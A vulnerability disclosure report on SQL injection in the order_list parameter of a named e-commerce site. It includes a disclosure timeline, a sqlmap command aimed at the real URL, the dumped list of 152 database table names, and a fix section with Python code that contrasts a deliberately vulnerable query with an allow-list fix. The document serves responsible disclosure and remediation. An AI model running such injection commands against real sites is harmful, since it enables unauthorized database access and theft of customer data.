Vulnerability details

Disclosure status:

2014-09-30: Details reported to the vendor, awaiting vendor handling
2014-09-30: Vendor has confirmed; details disclosed to the vendor only
2014-10-10: Details disclosed to core white hats and relevant domain experts
2014-10-20: Details disclosed to regular white hats
2014-10-30: Details disclosed to intern white hats
2014-11-14: Details disclosed to the public

Brief description:

Detailed description:

Dangerous characters in user input are not correctly sanitized before the input reaches the SQL query.

Proof of vulnerability:

The vulnerable parameter is order_list
python sqlmap.py -u "http://shop.tcl.com/mall/goods/index.html?attrs_216=541&cat_id=20&order_list=*&porder=stb" --dbs

Database: shoptcl
[152 tables]
+------------------------------+
| base_generate_number |
| c_goods_spec_index_0916 |
| ec_brand |
| ec_brand_category |
| ec_bulk_purchase |
| ec_cart |
| ec_category_spec |
| ec_category_spec_value |
| ec_comment |
| ec_comment_image |
| ec_consultation |
| ec_coupons |
| ec_coupons_goods |
| ec_coupons_use_detail |
| ec_custom_cat_menu |
| ec_evaluate |
| ec_evaluate_detail |
| ec_fenxiao_account |
| ec_fenxiao_copywritten |
| ec_fenxiao_fans_contact |
| ec_fenxiao_goods |
| ec_fenxiao_income_detail |
| ec_fenxiao_income_use_detail |
| ec_fenxiao_level |
| ec_fenxiao_order |
| ec_fenxiao_order_item |
| ec_fenxiao_product |
| ec_fenxiao_share |
| ec_fenxiao_share_stat |
| ec_fenxiao_shop_rela |
| ec_fenxiao_user |
| ec_fenxiao_user_audit |
| ec_fenxiao_user_cust |
| ec_fenxiao_withdraw |
| ec_freight_tpl |
| ec_freight_tpl_area |
| ec_freight_tpl_detail |
| ec_goods |
| ec_goods_collocation |
| ec_goods_custom_cat |
| ec_goods_gift |
| ec_goods_image |
| ec_goods_mapping |
| ec_goods_pkg |
| ec_goods_pkg_detail |
| ec_goods_pkg_image |
| ec_goods_relation |
| ec_goods_set |
| ec_goods_set_detail |
| ec_goods_spec_index |
| ec_group_purchase_item |
| ec_inventory_occupy_detail |
| ec_logistics_info |
| ec_logistics_tracking |
| ec_order |
| ec_order_discount |
| ec_order_item |
| ec_order_log |
| ec_order_msg_log |
| ec_order_refund |
| ec_order_refund_log |
| ec_payment |
| ec_payment_cfg |
| ec_product |
| ec_product_sku_rela |
| ec_product_sku_rela_0918 |
| ec_promotion |
| ec_promotion_discount |
| ec_promotion_integral |
| ec_promotion_present |
| ec_promotion_reduce |
| ec_promotion_seckill |
| ec_push_msg |
| ec_search_keword |
| ec_search_keyword |
| ec_search_log |
| ec_search_rela_keword |
| ec_search_weight_adjust |
| ec_search_weight_rule |
| ec_service_policy |
| ec_shop |
| ec_shop_category |
| ec_shop_sub_account |
| ec_spec |
| ec_spec_value |
| ec_store |
| ec_store_cover |
| ec_store_inventory |
| ec_store_sku |
| ec_transfer_account |
| ec_user_favorite |
| ec_user_history |
| esb_app_info |
| esb_app_permission |
| esb_msg_data |
| esb_msg_que |
| esb_service |
| esb_service_api |
| ro_resource |
| ro_role |
| ro_role_priv |
| ro_seller_log |
| ro_seller_menu |
| ro_subacct_role |
| ro_user |
| ro_user_address |
| sys_access_log |
| sys_admin |
| sys_admin_log |
| sys_admin_role |
| sys_admin_role_priv |
| sys_article |
| sys_caches |
| sys_category |
| sys_custom_category |
| sys_dict |
| sys_dict_type |
| sys_district |
| sys_email_verify_code |
| sys_feedback |
| sys_file |
| sys_file_server |
| sys_file_type |
| sys_image_thumbrule |
| sys_meta |
| sys_object_file |
| sys_point_rule |
| sys_position |
| sys_position_data |
| sys_position_keyword |
| sys_position_space |
| sys_poster |
| sys_poster_click |
| sys_poster_space |
| sys_reg_invite |
| sys_resource |
| sys_role |
| sys_session |
| sys_setting |
| sys_sms_sendlist |
| sys_sms_templates |
| sys_sms_verify_code |
| sys_template |
| sys_template_type |
| sys_user_point |
| sys_user_point_detail |
| sys_user_point_use_detail |
| sys_user_rank |
| sys_widget_callset |
| sys_widget_template |
| sys_widget_type |
| tmp_0916 |
+------------------------------+

Fix recommendation:

Use parameterized SQL statements. Note that a sort column such as order_list cannot be supplied as a bound parameter; it must be resolved against an allow-list of permitted column names.
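The following is an added example (not code from the report or from the shop's code base) showing the vulnerable pattern the report describes beside the fixed form. It assumes a small SQLite stand-in for the goods table; the schema, the ORDER_COLUMNS allow-list and the function names are constructed for illustration. The filter value is bound as a parameter; because SQL cannot bind an ORDER BY column name, the sort key is looked up in an allow-list instead.

```python
import sqlite3

# Constructed stand-in schema; the real shop schema is not on the page.
SCHEMA = """
CREATE TABLE ec_goods (goods_id INTEGER PRIMARY KEY, cat_id INTEGER, name TEXT, price REAL);
INSERT INTO ec_goods VALUES (1, 20, 'tv-a', 300.0), (2, 20, 'tv-b', 150.0), (3, 21, 'phone', 99.0);
"""

# Hypothetical allow-list: sort keys the application exposes -> real column names.
ORDER_COLUMNS = {"price": "price", "name": "name", "goods_id": "goods_id"}


def make_db():
    """Create an in-memory database populated with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_query(conn, cat_id, order_list):
    """The flaw in the report: request text is pasted straight into the SQL string,
    so whatever arrives in order_list becomes part of the query structure."""
    sql = f"SELECT goods_id FROM ec_goods WHERE cat_id = {cat_id} ORDER BY {order_list}"
    return [row[0] for row in conn.execute(sql)]


def sort_key_is_allowed(order_list):
    """True only when order_list names a sort key from the allow-list."""
    return order_list in ORDER_COLUMNS


def safe_query(conn, cat_id, order_list, direction="asc"):
    """Hardened form: the filter value is a bound parameter; the sort column and
    direction are taken from fixed allow-lists, never from the request text."""
    if not sort_key_is_allowed(order_list):
        raise ValueError(f"unsupported sort key: {order_list!r}")
    if direction not in ("asc", "desc"):
        raise ValueError("direction must be asc or desc")
    column = ORDER_COLUMNS[order_list]
    sql = f"SELECT goods_id FROM ec_goods WHERE cat_id = ? ORDER BY {column} {direction.upper()}"
    return [row[0] for row in conn.execute(sql, (int(cat_id),))]


if __name__ == "__main__":
    db = make_db()
    # Both accept a legitimate sort key ...
    print(vulnerable_query(db, 20, "price"), safe_query(db, 20, "price"))
    # ... but only the vulnerable version lets the caller rewrite the ORDER BY clause.
    print(vulnerable_query(db, 20, "price DESC, name"))
    print(sort_key_is_allowed("price DESC, name"))
```

The allow-list mapping is the important design point: validating the sort key by a lookup rather than by stripping "dangerous characters" means the query structure is fixed by the code and the request can only choose among known columns.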
